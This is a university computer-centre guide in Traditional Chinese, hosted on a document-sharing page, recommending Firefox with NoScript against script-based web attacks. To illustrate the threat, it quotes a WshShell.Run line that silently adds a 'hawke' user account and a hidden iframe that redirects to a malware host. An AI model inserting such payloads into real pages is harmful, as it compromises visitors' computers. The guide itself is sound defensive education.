安装Firefox 及noscript 增加上网的安全性 - 资讯中心.PDF

安装Firefox 及noscript 增加上网的安全性 - 资讯中心.PDF

  1. 1、本文档共5页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
安装Firefox 及noscript 增加上网的安全性 - 资讯中心

安裝 Firefox及 noscript增加上網的安全性 目前網頁上被植入的惡意程式碼大部分皆使用 Script 語法(JavaScript、 VBScript),攻擊方式如修改 IE 首頁 、禁止修改首頁(首頁綁架)、打開遠端桌 面或新增一組帳號(如於 sc ript語法中加入 WshSh ell.Run“net user hawke 12345 /add",“0",“True",將增加一組帳號 hawke,密碼 12345)。若使用 舊版 IE或無安全設定,開啟網頁後就會自動執行。 使用 Firefox 及 noscript 可以阻擋網頁上的 Script 程式執行,減少因上 網中毒的發生,但由於許多正常網頁也是使用 Script 語法寫成,所以也可能造 成網頁無法顯示。 而必威体育精装版的 iframe(網頁內嵌框架)攻擊,則是在網頁中插入一 iframe,並 設定為隱藏,所以使用者上網後沒有任何感覺,範例插入內容為iframe src=http://a5j.ru:8080/ts/xxx width=125 height=125 style=visibility: hidden,使用者將被導到惡意網站下載惡意程式,有的防毒軟體無法偵測。 若不安裝類似 noscript的軟體,很難偵測到。 1. 下載安裝Firefox(http://moztw .org/firefox/,下載程式請至官方網站) 國立台灣師範大學資訊中心 2.下載安裝NoScript,官網 http://n /,點選download 3. 安裝 NoScript,點選 Add to firefox。 國立台灣師範大學資訊中心 4.以新浪網為例,阻擋所有的 Script 語法,則許多網頁無法開啟。 5.允許 .tw 的 Script,則部份網頁可以開啟。 國立台灣師範大學資訊中心 6.設定 NoScript 禁止所有的選項,以增加安全性。 好處: 可以阻擋不明的惡意程式碼,增加安全性。 可自訂白名單,也可阻擋 Flash、iframe 及 XSS 攻擊。 缺點: 較麻煩。 國立台灣師範大學資訊中心 駭客攻擊方式: 於正版軟體中夾帶木馬程式放置於網站供人下載。 於 IE 上跳出假冒的 ActiveX 元件。 線上免費遊戲、免費軟體下載(夾帶非法程式)。 影片檔也可夾帶惡意程式。 利用微軟弱點在圖片檔或文件檔夾帶惡意程式。 透過你的電腦攻擊別人電腦。 攻擊網站,修改網頁程式碼並加入惡意連結,使用者點選網頁立即中毒。 請參考資安之眼 TW 網站淪陷資料庫(http:// www.itis.tw/compromised) 防禦方式: 不知名執行檔不要開啟,下載檔案請到官方網站。 不明郵件不要隨意開起,設定郵件安全設定。 不要隨意下載文件、圖片、音樂及影片等。 安裝防毒軟體及設定防火牆機制。 進行 windows update、office update 及其他如 acrobat 等的更新。 下班或無人使用時請將電腦關機。 了解駭客行為。 網路攻防戰 http://anti-hack / 國立台灣師範大學資訊中心

文档评论(0)

youbika + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档